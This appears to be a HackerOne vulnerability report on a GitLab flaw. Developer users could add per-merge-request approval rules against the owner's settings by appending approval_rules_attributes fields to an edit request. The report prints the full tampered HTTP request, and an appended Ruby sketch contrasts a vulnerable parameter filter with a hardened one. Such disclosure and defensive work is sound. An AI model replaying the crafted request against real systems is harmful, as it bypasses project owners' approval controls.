Override approvers and approvals required per merge request despite no permissions

HackerOne report #544756 by ashish_r_padelkar on 2019-04-21, assigned to estrike:

Summary

Hello,

Owner/Maintainer of the project may prevent overriding of approvers and approvals required per merge request by having the below settings in project settings

Screenshot_2019-04-22_at_00.28.49.png

However, Developer users can still create new approval rules per merge request!

Steps to reproduce

  1. As a project owner, set settings like below for the merge request approval rule

Screenshot_2019-04-22_at_00.28.49.png

  2. As a Developer user in a project, go to any merge request and EDIT it. Once it reloads, you see that you cannot EDIT or create new approval rules.

  3. Without doing anything else, just click on save and capture the below request

POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 542
Cache-Control: max-age=0
Origin: https://gitlab.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false

utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=ExampleMergeRequest&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=

  4. Append the below parameters to the above request

&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1

Here 3148078 is my user ID; you may try adding yours if mine doesn't work for you.

  5. So the final request would be like

POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 542
Cache-Control: max-age=0
Origin: https://gitlab.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false

utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=WIP%3A+Resolve+%22yyyy%22&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1

  6. Send this request. Once done, click on EDIT merge request again and scroll down to approval rules.

  7. Now you should see the approval rule created despite it not being allowed by owners!

Screenshot_2019-04-22_at_00.31.04.png

What is the current bug behavior?

Developer can override the merge request approval rules despite settings by owner!

What is the expected correct behavior?

Developers should not be allowed to create approval rules when the owner has not allowed them to.

Output of checks

This bug happens on GitLab.com and probably on omnibus installations too!

Regards,
Ashish

Impact

Developers can override approval rule settings
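As an added illustration (not GitLab's code and not part of the report), the Ruby below shows the class of defect the report describes: a server that accepts every `merge_request[...]` field in the form body, including the `approval_rules_attributes` fields the UI hid, beside a filter that strips those fields when the project setting disallows overriding and returns the stripped keys so they can be logged. The request body, the `overriding_disabled` flag and the function names are constructed for this example.

```ruby
require 'cgi'

# Constructed sample body modelled on the report: the normal edit-form fields
# plus the three approval-rule parameters a Developer appended by hand.
TAMPERED_BODY =
  "utf8=%E2%9C%93&_method=patch&merge_request%5Btitle%5D=ExampleMergeRequest" \
  "&merge_request%5Btarget_branch%5D=master" \
  "&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer" \
  "&merge_request[approval_rules_attributes][][user_ids][]=3148078" \
  "&merge_request[approval_rules_attributes][][approvals_required]=1"

# Key prefix under which per-merge-request approval rule changes arrive.
APPROVAL_RULE_PREFIX = "merge_request[approval_rules_attributes]"

# Decode an application/x-www-form-urlencoded body into key => [values];
# CGI.parse unescapes keys, so %5B/%5D become the literal [ and ].
def parse_form(body)
  CGI.parse(body)
end

# Vulnerable behaviour as described in the report: every merge_request[...]
# key is accepted, so fields the UI hid are still honoured server side.
def permit_all(params)
  params.select { |key, _| key.start_with?("merge_request[") }
end

# Hardened behaviour (hypothetical, not GitLab's implementation): when the
# project disables overriding approvers per merge request, approval-rule
# keys are stripped before the update is applied. Returns the permitted
# params and the stripped keys, so a caller can log the latter: the edit
# form never emits these fields, so their presence means a crafted request.
def permit_with_setting(params, overriding_disabled:)
  permitted = {}
  dropped = []
  params.each do |key, values|
    next unless key.start_with?("merge_request[")
    if overriding_disabled && key.start_with?(APPROVAL_RULE_PREFIX)
      dropped << key
    else
      permitted[key] = values
    end
  end
  [permitted, dropped]
end
```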
